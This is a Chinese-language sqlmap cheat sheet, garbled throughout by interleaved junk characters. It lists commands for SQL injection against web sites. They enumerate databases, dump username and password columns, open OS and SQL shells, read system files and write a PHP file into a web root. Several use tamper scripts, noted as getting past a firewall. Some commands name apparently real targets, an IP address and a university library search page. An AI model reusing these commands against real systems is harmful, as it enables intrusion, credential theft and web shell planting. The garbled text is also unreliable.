/pentest/database/sqlmap( P& X! `' Z0 m
8 r) p9 b3 U! K- I. F; s9 zupdate :::::> in the folder after execute following order : svn update3 I u9 B- M/ G3 Z: L: L+ \- X
! e9 G4 |$ k: R7 W+ D
sqlmap.py -r 1.txt --current-db
3 D1 a0 ?5 M9 B8 U& _1 `+ `' a! i1 T* j) y2 u% s( g: _
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”1 K+ Q( w# {- _ V
- ?3 d: ?6 {# a8 f
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
0 R8 R7 I( b) d4 F" `3 D猜解数据库4 Q5 D1 R1 M: G5 j+ o ^3 V$ t
./sqlmap.py -u "injection-url" --dbs6 X3 q0 _ S/ j3 F- ~0 f
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
( ^7 V2 H% ?4 n3 R6 \ R$ j9 X* x3 x: v' q
猜解表名* [; t3 F( w4 P8 j3 v+ p) [7 N
./sqlmap.py -u "injection-url" -D database_name --tables& F6 I8 C( L$ k* v2 i% S2 F; y
) ]+ U, |/ _6 l/ e
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"& [, f+ g1 f7 z& v
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 9 d/ i. x& x* i; z0 i7 s
* E, C: ^% P" K& I
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump! d3 J, F' C( V x( a! C1 [7 I" s
1 p& K2 t* C& p: r# b; bsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
5 ]1 V8 ?: H* R. f. C* J- v9 q' ssqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
; K( Z% e; d' a+ Hsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
! `- j* C" o- O) S5 L/ Z8 xsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"7 y5 F3 p9 f* O4 z; Q
3 Z3 Y7 W1 M- b
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"' C }# f7 r6 J) w) q
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
; n* F* @6 y, p3 P% Asqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
) g4 ?! H. `4 L0 k2 X- bsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"! J O, C" l. t1 T1 N6 y3 ^+ ^% P
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump! I; Z% A/ |0 j* [5 S
9 ` r& a! v; B6 b" G: u, k! f5 L
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了 ?+ O0 e' E6 c$ M9 a
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py". p: q2 X1 _+ g7 \
! z* A' @) r5 d1 ~
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"3 r+ ^, ~/ F8 F: h! m9 e8 P. ]
猜解列名# E) @( I3 }% m G' ^+ s, O
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns! o. X$ g$ s4 Q' G) l: p7 C$ U
) i- R6 |% `. ? b$ Xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 7 T0 P6 n2 p0 v$ X; k
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
7 u( q9 l8 p4 K: \$ Hsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py", D R; N+ a, A4 U
% \- N% L1 ^7 e5 P8 p0 C
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"' N0 ?7 x" {$ Y
&submit=Go5 W, H1 p! }8 v- I5 J* r7 E) m! a
猜解值* j7 O- [% Z4 h' v2 T
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
& j& v8 |$ i2 a6 W========================================================
+ s6 \% B; f' t9 h% [搜索表名中包括mana字符的
2 G- C2 f& B# z( t" l* T/sqlmap.py -u "injection-url" -T mana --search4 p3 U( ?( e+ F; f( W8 `
返回一个交互式sql shell
& z, @! u) G( ^; n# A/sqlmap.py -u "injection-url" --sql-shell8 Z1 A5 n w2 [0 w
读取指定文件(需权限)6 Z9 k4 z& [' b _
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
2 \& I" d; `3 D4 I) E; z查看当前 用户 及 数据库
: N$ Z8 |' C7 `" _/sqlmap.py -u "injection-url" --current-user --current-db
! w0 `( U. ?; |3 p& y& e本地文件 写入 远程目标绝对路径4 n6 [. m! Y: x" m1 j- F) I
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
" _5 J v! r$ ]8 ?, E% csqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
9 g+ M7 T F8 I6 {& e$ Q( @
1 n! m* Q; ~0 B6 \sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径2 Y* q! ^% ~8 d% ]! d
查看某用的权限' l; h2 g. g s5 V: Q9 V
/sqlmap.py -u "injection-url" --privileges -U root
2 A, h) h7 a; J( ^查看当前用户是否为dba
. k/ H* a- a: \4 A/sqlmap.py -u "injection-url" --is-dba
; L# R4 f# g1 ?: B: z/ |读取所有数据库用户或指定数据库用户的密码
+ E4 k- F8 p7 Xsqlmap.py -r 1.txt --users --passwords
+ O. k7 }3 Z( K2 ^0 Y+ b6 Qsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
5 y6 P( d: ~" P- i$ f
4 m! A& q) L' k" J7 i( `, T/sqlmap.py -u "injection-url" --passwords -U root: x- c3 N5 ~ R* O, O* R! l8 |
- o2 ]5 p% N, E4 z
--start&&--stop 与 --first&&--last 的区别3 [8 y+ {5 i! ]) S9 h
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)" B Q9 k4 ^, z4 K+ s
* L; l$ q; N' o7 e从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
; H9 x M; B2 U- f/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
2 j5 {) c) ?( N: w/ M: X/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
5 q, h+ F7 p# ~4 B9 A& y6 |# W+ S% |' X. J; D9 ~+ X. Q* B1 e
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
; y( z% z9 h' \9 W6 g/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"7 [' V/ w9 e+ \8 ]1 l. Q, n' Q
: r% R1 M$ [3 F) Q8 J' g" h( {' x
|